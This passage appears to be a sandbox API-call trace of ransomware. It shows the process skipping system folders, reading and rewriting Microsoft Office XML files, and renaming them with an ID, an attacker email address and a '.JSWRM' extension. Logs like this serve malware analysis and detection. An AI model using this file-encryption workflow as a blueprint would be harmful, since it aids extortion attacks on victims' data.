lstrcmpiW (lpString1="PGLBL077.XML", lpString2="...") returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="windows") returned -1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="recovery") returned -1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="perflogs") returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="documents and settings") returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="system volume information") returned -1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="msocache") returned 1 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL077.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL077.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL077.XML", lpUsedDefaultChar=0x0) returned 12 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL077.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL077.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL077.XML", lpUsedDefaultChar=0x0) returned 12 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL077.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl077.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.461] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24884) returned 1 [0138.461] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.461] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6130, lpOverlapped=0x0) returned 1 [0138.464] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.464] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6130, lpOverlapped=0x0) returned 1 [0138.464] CloseHandle (hObject=0x238) returned 1 [0138.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL077.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl077.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL077.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl077.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.465] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x753, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL078.XML", cAlternateFileName="")) returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2=".") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="..") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="...") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="windows") returned -1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="recovery") returned -1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="perflogs") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="documents and settings") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="system volume information") returned -1 [0138.465] lstrcmpiW (lpString1="PGLBL078.XML", lpString2="msocache") returned 1 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL078.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL078.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL078.XML", lpUsedDefaultChar=0x0) returned 12 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL078.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL078.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL078.XML", lpUsedDefaultChar=0x0) returned 12 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL078.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl078.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.466] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1875) returned 1 [0138.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.466] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x750, lpOverlapped=0x0) returned 1 [0138.469] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.469] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x750, lpOverlapped=0x0) returned 1 [0138.469] CloseHandle (hObject=0x238) returned 1 [0138.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL078.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl078.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL078.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl078.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.470] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc39fa2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcffca, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL081.XML", cAlternateFileName="")) returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2=".") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="..") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="...") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="windows") returned -1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="recovery") returned -1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="perflogs") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="documents and settings") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="system volume information") returned -1 [0138.470] lstrcmpiW (lpString1="PGLBL081.XML", lpString2="msocache") returned 1 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL081.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL081.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL081.XML", lpUsedDefaultChar=0x0) returned 12 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL081.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL081.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL081.XML", lpUsedDefaultChar=0x0) returned 12 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL081.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl081.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.471] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=851914) returned 1 [0138.471] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.471] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.485] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.485] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.485] CloseHandle (hObject=0x238) returned 1 [0138.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL081.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl081.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL081.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl081.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.486] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1fc13dfb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1fc13dfb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc86400, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38d3a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL082.XML", cAlternateFileName="")) returned 1 [0138.486] lstrcmpiW (lpString1="PGLBL082.XML", lpString2=".") returned 1 [0138.486] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="..") returned 1 [0138.486] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="...") returned 1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="windows") returned -1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="recovery") returned -1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="perflogs") returned 1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="documents and settings") returned 1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="system volume information") returned -1 [0138.487] lstrcmpiW (lpString1="PGLBL082.XML", lpString2="msocache") returned 1 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL082.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL082.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL082.XML", lpUsedDefaultChar=0x0) returned 12 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL082.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL082.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL082.XML", lpUsedDefaultChar=0x0) returned 12 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL082.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl082.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.488] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=232762) returned 1 [0138.488] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.488] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.511] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.511] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.511] CloseHandle (hObject=0x238) returned 1 [0138.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0138.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0138.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0138.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0138.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0138.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0138.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0138.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0138.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL082.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl082.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL082.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl082.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0138.516] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f09a814, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f09a814, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc13dfb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8cda, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL083.XML", cAlternateFileName="")) returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2=".") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="..") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="...") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="windows") returned -1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="recovery") returned -1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="perflogs") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="documents and settings") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="system volume information") returned -1 [0138.516] lstrcmpiW (lpString1="PGLBL083.XML", lpString2="msocache") returned 1 [0138.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL083.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL083.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL083.XML", lpUsedDefaultChar=0x0) returned 12 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0138.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL083.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL083.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL083.XML", lpUsedDefaultChar=0x0) returned 12 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0138.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0138.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0138.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL083.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl083.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.533] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36058) returned 1 [0138.533] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8cd0) returned 0x27b348 [0138.533] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8cd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8cd0, lpOverlapped=0x0) returned 1 [0138.557] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.557] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8cd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8cd0, 